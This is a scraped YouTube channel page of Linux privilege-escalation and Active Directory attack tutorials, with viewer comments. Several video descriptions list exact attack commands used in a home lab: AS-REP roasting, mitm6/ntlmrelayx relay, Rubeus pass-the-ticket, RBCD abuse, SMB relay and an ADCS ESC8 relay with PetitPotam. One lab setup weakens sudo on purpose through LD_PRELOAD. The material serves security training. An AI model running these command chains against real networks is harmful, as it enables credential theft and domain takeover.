- Видео 89
- Просмотров 264 942
Thatquietkid
Индия
Добавлен 2 дек 2017
Wannabe hacker
Check out my Active Directory Penetration Testing Lab: github.com/AnikateSawhney/Active-Directory-Penetration-Testing-Lab
Check out my Active Directory Penetration Testing Lab: github.com/AnikateSawhney/Active-Directory-Penetration-Testing-Lab
Linux Privilege Escalation Series: Part 7 (Shared Library and Environment Variable LD_PRELOAD)
Topic Covered:
Shared Library and Environment Variable LD_PRELOAD
Steps for lab setup that you have to do yourself:
1) Login into VM and switch user to root (toor is the pass)
2) visudo (add this line: Defaults env_keep += LD_PRELOAD)
3) Save the file
Shared Library and Environment Variable LD_PRELOAD
Steps for lab setup that you have to do yourself:
1) Login into VM and switch user to root (toor is the pass)
2) visudo (add this line: Defaults env_keep += LD_PRELOAD)
3) Save the file
Просмотров: 66
Видео
Linux Privilege Escalation Series: Part 6 (Docker and LXD)
Просмотров 81Месяц назад
Topics Covered: Docker and LXD Timestamps: 00:00 - 05:48 (Docker) 05:49 - 13:47 (LXD)
Linux Privilege Escalation Series: Part 5 (CAP_DAC_READ_SEARCH, CAP_SETUID, SYS_ADMIN, SYS_Module)
Просмотров 177Месяц назад
Topics Covered: Capabilities: 1) CAP_DAC_READ_SEARCH 2) CAP_SETUID 3) CAP_SYS_ADMIN 4) CAP_SYS_MODULE Timestamps: 00:00 - 05:24 (CAP_DAC_READ_SEARCH) 5:25 - 08:17 (CAP_SETUID) 08:18 - 13:50 (CAP_SYS_ADMIN) 13:51 - 20:35 (CAP_SYS_MODULE)
Linux Privilege Escalation Series: Part 4 (Path Variable and Restricted Shell)
Просмотров 140Месяц назад
Topics Covered: Path Variable exploitation and escaping Restricted Shell Timestamps: 00:00 - 08:56 (Path Variable) 08:57 - 12:05 (Escaping Restricted Shell)
Linux Privilege Escalation Series: Part 3 (NFS and Wildcard)
Просмотров 169Месяц назад
Topics Covered: NFS share exploitation and Wildcard Injection Timestamps: 00:00 - 06:33 (Misconfigured NFS) 06:33 - 12:32 (Wildcard Injection)
Linux Privilege Escalation Series: Part 2 (Cronjob and Service)
Просмотров 233Месяц назад
Topics Covered: Cronjobs and Services Timestamps: 00:00 - 05:54 (Cronjobs Privilege Escalation) 5:55 - 13:24 (Service Privilege Escalation)
Linux Privilege Escalation Series: Part 1
Просмотров 174Месяц назад
This video is the first of the linux privilege escalation series. Topics Covered: Password in files, Misconfigured File Permissions, Sudo Permissions and SUID Permissions. Timestamps: 00:00 - 00:45 (Intro and all) 00:45 - 3:28 (Password in Files) 3:28 - 5:36 (Misconfigured File Permissions) 5:37 - 7:33 (Sudo Permissions) 7:43 - 11:12 (SUID Permission) Lab Link: github.com/AnikateSawhney/Linux-P...
My CRTP Experience (I Passed the Exam)
Просмотров 1,3 тыс.9 месяцев назад
CRTP Course link: www.alteredsecurity.com/adlab
ACLs Abuse
Просмотров 32910 месяцев назад
Welcome to my RUclips channel. In this video, I delve into ACLs abuse, aiming to provide valuable insights and educational content. Educational Purpose: Learn how to exploit ACLs in an active directory environment. Disclaimer: This video is intended solely for educational purposes. It explores Active Directory Attack vector - ACLsAbuse. I do not endorse or encourage any unethical or malicious a...
AS-REP Roasting Attack
Просмотров 19011 месяцев назад
Commands used: 1) impacket-GetNPUsers BERSERK.local/ -usersfile users.txt -dc-ip 10.0.2.16 2) john wordlist=wordlist.txt hash.txt 3) crackmapexec smb 10.0.2.16 -u roastme -p 'R0asting!!' Feel free to ask any doubts in the comment section.
IPV6 DNS Takeover Attack
Просмотров 55411 месяцев назад
Link to the repository: github.com/dirkjanm/mitm6 Commands used: 1) mitm6 -d BERSERK.local 2) impacket-ntlmrelayx -6 -t ldaps://10.0.2.16 -wh fakepad.BERSERK.local -l loot 3) impacket-secretsdump -dc-ip 10.0.2.16 -just-dc BERSERK.local/'user':'password'@10.0.2.16. Feel free to ask any doubts in the comments section.
Unconstrained Delegation Attack
Просмотров 45911 месяцев назад
Commands used: 1) dir \\DC1\c$ 2) .\Rubeus.exe monitor /interval:5 3) klist 4) .\Rubeus.exe ptt /ticket: 5) klist 6) dir \\DC1\c$ 7) Enter-PSSession -ComputerName DC1 Feel free to ask any doubts in the comment section.
Resource-based Constrained Delegation (RBCD)
Просмотров 1 тыс.11 месяцев назад
Commands used: 1) crackmapexec ldap 10.0.2.16 -u rbcd -p 'd3l3g@tion!!' -M maq 2) impacket-addcomputer -computer-name 'Test$' -computer-pass 'Test@123!!' -dc-ip 10.0.2.16 'BERSERK.local'/'rbcd':'d3l3g@tion!!' 3) impacket-rbcd -delegate-from 'Test$' -delegate-to 'Win10$' -dc-ip 10.0.2.16 -action 'write' 'BERSERK.local'/'rbcd':'d3l3g@tion!!' 4) impacket-getST -spn 'cifs/Win10.BERSERK.local' -impe...
SMB Relay Attack
Просмотров 1,4 тыс.11 месяцев назад
Commands used: 1) nano /etc/responder/Responder.conf (turn off SMB and HTTP server) 2) responder -I eth0 3) impacket-ntlmrelayx -tf targets.txt -smb2support Feel free to ask any doubts in the comment section.
Exploiting Misconfigured ADCS: ESC8 (PART 2)
Просмотров 303Год назад
Corrections: At 4:11 The Domain Controller Machine Account by default has DCSync Rights. At 9:26 Unauthorized At 11:45 Didn't specify the extension Commands Used: 1) certipy relay -target 192.168.0.170/ -template Domain Controller. 2) python3 petitpotam.py -u reze -p 'b0mbd3vil!!' 192.168.0.136 192.168.0.160. 3) certipy auth -pfx dc1.pfx -dc-ip 192.168.0.170 4) crackmapexec smb 192.168.0.160 -u...
Exploiting Vulnerable Active Directory Certificate Template: ESC4
Просмотров 426Год назад
Exploiting Vulnerable Active Directory Certificate Template: ESC4
Exploiting Vulnerable Active Directory Certificate Template: ESC1
Просмотров 3,2 тыс.Год назад
Exploiting Vulnerable Active Directory Certificate Template: ESC1
MY OSCP EXAM EXPERIENCE(FAILED WITH 60 POINTS)
Просмотров 1,2 тыс.Год назад
MY OSCP EXAM EXPERIENCE(FAILED WITH 60 POINTS)
Copy and Paste text from Windows Host Machine to Ubuntu Virtual Machine
Просмотров 100 тыс.2 года назад
Copy and Paste text from Windows Host Machine to Ubuntu Virtual Machine
Microsoft Windows Hardening Tryhackme
Просмотров 2,6 тыс.2 года назад
Microsoft Windows Hardening Tryhackme
Kali Linux Update error (Could not connect to http.kali.org)
Просмотров 67 тыс.2 года назад
Kali Linux Update error (Could not connect to http.kali.org)
Intro to Malware Analysis Tryhackme
Просмотров 2,1 тыс.2 года назад
Intro to Malware Analysis Tryhackme
How to install android 9 as a virtual machine
Просмотров 5762 года назад
How to install android 9 as a virtual machine
How to convert any python file to .exe
Просмотров 1222 года назад
How to convert any python file to .exe
NPTEL Ethical Hacking Week 12 Assignment Answers
Просмотров 5 тыс.2 года назад
NPTEL Ethical Hacking Week 12 Assignment Answers
NPTEL Ethical Hacking Week 11 Assignment Answers
Просмотров 3,6 тыс.2 года назад
NPTEL Ethical Hacking Week 11 Assignment Answers
Had the same issue If doesn't work , close terminal then restart virtual and try it again.From my side it worked
Telling This one... bzip2 not found. Please install: bzip2 tar; and try again.
Didn't work, i restarted and everything
Finally 😢, thanks man ❤
Thank you brother ❤❤❤❤
Thanks!
not wokring
bro as u shown in your'er creds.txt that all username pass are same but when i am trying to login it does'nt accepts from user1 to user7 ?? so what is its passwords are ???
@@Podcastshoti the password for user1 is user1. Same for every user.
It worked. Thank you.
Thank It's Worked
Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab
Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab
Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab
Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab
Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab
Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab
Link to the lab: github.com/AnikateSawhney/Linux-Privilege-Escalation-Lab
it says vboxlinuxadditions command not found
Thank you so much man
A mistake I made during this video, in CAP_SYS_MODULE, when creating the Makefile, modify the content from /lib/... to lib/.. at 18:05 (we need to use our own libraries that we copied)
Thank you brother. It worked
worked at 30th OCT 2024, thank you brother! QUICK TIP : make sure to reboot your VM at the end of the installation
Check the description
🎉
Not working
After I did this I was note able to keep the mouse pointer at Ubuntu VM
where u download guest addiction?
Who says that indian programmers are not legends? 😂❤ (It worked)
Good bro ❤
Chuntye ye krne kai bd ab dobara se graphical install /install mang rha kya krwa dya farigh insan
Thank you for sharing. This was very informative 👏
I've been trying to find a solution for this for nearly 2 hours now and nothing worked. But this not only fixed the copy and paste, the auto-screen, but also the machine shared files as well. Thank you so much!
Thank you, I wish I had found your solution much earlier!
Thank you so much!
Thank you so much dude, after running all ssh commands, I'm able to connect with the Putty.
thanks aniket
tried it but doesn't work!
unable to execute aara h
thanks!
Hi, if the domain controller ip isn't available, is it appropriate to run the dc-ip replaced with the adcs server instead? Will that yield the same results?
Bro how to get coupon code
thank you @Thatquietkid
Bhaiya save kaise kre likhne ke bdd? Aur uske bdd back kaise jaaye
Pretty good explanation bro, I was stuck on this. Thanks for help
Not working, it says permission denied when I tried to run vboxlinuxadditions
did u find a fix?
@@Harbi15 not yet, did you find any solution ?
same problem here
Thankyou BOSS, Your the MAN ! 😉😊😄😁😁
works like a charm! thank you Sir! (Oneplus 8 Pro Nethunter)
Stupid question,how can I add a vulnerable certificate to my DC?
this mother f*cker broke my ubuntu
Work perfectly fine ! Thanks for your effort, mate.
Thank you very much.